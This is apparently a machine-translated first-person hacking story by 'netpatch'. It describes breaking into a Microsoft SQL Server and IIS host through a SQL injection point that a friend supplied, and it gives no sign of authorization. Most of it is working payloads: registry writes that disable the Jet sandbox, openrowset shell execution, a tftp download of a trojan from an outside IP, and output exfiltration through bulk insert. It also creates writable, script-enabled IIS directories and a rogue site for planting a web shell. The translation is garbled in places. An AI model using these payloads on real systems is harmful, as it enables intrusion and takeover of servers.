Remember a clever hacking

Remember a clever hacking ~
By netpatch
On that day, I was reading the materials. My friend lost a URL and said it was a SA injection point. But the database and WEB were separated and I didn't get it done for a long time.
As soon as I heard about the SA injection point, it should be easy to say, so I am very casual to say, OK, no problem, and I will give the result ~
It is a SA injection point. I will not write down the judgment process. The highlights will certainly be left behind.
Starting with NBSI, the big knife started. First, try to restore the xp_mongoshell and sp_OACreate extended storage. After the restoration, use the extended storage to execute a command at will, but judge from the echo result,
The command is not successfully executed. Therefore, the xp_servicecontrol extended storage is restored. Because the extended storage is not displayed, a file is randomly ECHO to a specified directory.
Then, the column directory function is used to list the directory, but no written file is found. I thought, it should be the administrator who gave all the frequently used hacking extended storage to X.
I don't know if the xp_regwrite extended storage is X. The Sandbox mode is manually enabled.
Asp? Idx = 32; exec master .. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Jet \ 4.0 \ Engines', 'sandboxmode', 'reg _ dword', 0 ;--
Then try to ECHO a file to the specified directory in sandbox mode.
Asp? Idx = 32 and 0 <> (select * from openrowset ('Microsoft. jet. oledb.4.0 ','; database = c: \ winnt \ system32 \ ias. mdb ', 'select shell ("cmd/c echo xx
> C: \ xxx \ xxx.txt ")'))--
Use the column directory function to list the directory again and find that the ECHO command is successfully executed! HOHO. Fortunately, the Administrator did not store this extended storage to X.
With the extended storage of executable commands, there is a glimmer of hope. So I want to use tftp to get UP immediately .. Run the tftp-I ip get muma.exe c: \ muma.exe command, and the result is not reflected at all.
The guess may be restricted by the administrator or DEL. So I wrote a sentence to download VBS. After the execution, we didn't find our horse for a long time. Isn't he able to access the Internet?
Therefore, I executed the IPCONGFIG command again and ECHO it to the np. tmp temporary file. But we cannot see the ECHO content. How can we get the IP address of the database server? Hey, think about it. Why does NBSI display it?
? We can also do that.
Asp? Idx = 32; create table [NP_ICEHACK] (ResultTxt nvarchar (1024) NULL) -- // CREATE a TABLE that puts the explicit content back.
Asp? Idx = 32 bulk insert [NP_ICEHACK] FROM 'np. tmp 'WITH (KEEPNULLS); insert into [NP_ICEHACK] values ('G _ over'); Alter Table [NP_ICEHACK] add id int
Not null identity () -- // write the content of the temporary file np. tmp to the NP_ICEHACK table in the form of backup
Then run the table directly with NBSI. After a while, the lovely IP will pop up in front of me. Then we started nmap and scanned it for a while. However, the scan result is a bit unexpected. 80 is enabled.
Is the database not isolated? The IP address of the PING domain name is different from the IP address of the database obtained. No matter how many users are there, visit the website first .. Access by using an IP address immediately.
It's strange to find a blank space! Therefore, add a directory at will and leave it blank. Dumb. This... This port is determined by nmap as IIS 5.0. Is it a false positive?
Think about it. Try again. How can we try it? Hey, I used the sandbox mode to execute the net stop w3svc command (to stop the entire WEB service ). Visit 80 again. YES, access fails. Even depressing
The white page also disappears. It seems that there is a drama, so I will execute the net start w3svc command (start the entire WEB service) Again. Visit 80 again and check that No web site is configured at this address.
Ah, there is also a bound domain name, it is not possible to make a virtual directory. Execute the following command to query the configuration of several sites (add 1 to view the configuration of other sites)
Cmd/c Cscript.exe c: \ Inetpub \ AdminScripts \ adsutil. vbs GET W3SVC/1/ServerBindings
View the port of the first virtual web site. W3SVC/1 is short for IIS: \ LocalHostW3SVC/1, while ServerBindings is its attribute.
If you still use the NBSI column to column 3 and find that it is bound to a domain name, run the following command to add a virtual directory
Cscript.exe c: \ Inetpub \ AdminScripts \ adsutil. vbs CREATE w3svc/3/Root/np "IIsWebVirtualDir"
Cscript.exe c: \ Inetpub \ AdminScripts \ adsutil. vbs SET w3svc/3/root/np/Path "C :\":
Cscript.exe c: \ Inetpub \ AdminScripts \ adsutil. vbs SET w3svc/3/Root/np/AccessRead 1
Cscript.exe c: \ Inetpub \ AdminScripts \ adsutil. vbs SET w3svc/3/Root/np/AccessWrite 1
Cscript.exe c: \ Inetpub \ AdminScripts \ adsutil. vbs SET w3svc/3/Root/np/AccessScript 1
Cscript.exe c: \ Inetpub \ AdminScripts \ adsutil. vbs SET w3svc/3/Root/np/EnableDirBrowsing 1
Cscript.exe c: \ Inetpub \ AdminScripts \ adsutil. vbs SET w3svc/3/Root/np/AccessSource 1
Happy to visit that domain name after adding
Is it to forward all the requests to www.xxx.com ??? Therefore, we set up a local platform to test ING .. As expected, it was forwarded.
Absolutely .. In this case .. After a period of thinking, I thought, "You don't want me to visit this station .. I promise you, I will build my own site to see you go. Hum ~
Execute the following command immediately.
Cmd/c cscript c: \ Inetpub \ AdminScripts \ mkw3site. vbs-r "c: \"-t "test"-c "LocalHost"-o "80"-h "netpatch.xx.com"
Bind your domain name to the IP address of the database server. Then access netpatch.xx.com HOHO.
So I immediately ECHO a sentence and went to the end of the hacing tour.
BTW: Actually, I encountered a lot of problems in this hacking. I also checked a lot of relevant information and tested it N times on the platform. Not as smooth as in the article.
The difficulty is that the other party only opens 80 and forwards only the WEB, and cannot access the Internet.
____ By NetPatch www.icehack.com & [P. T. U]
If you want to reprint it, please keep the article complete. Thank you for your cooperation!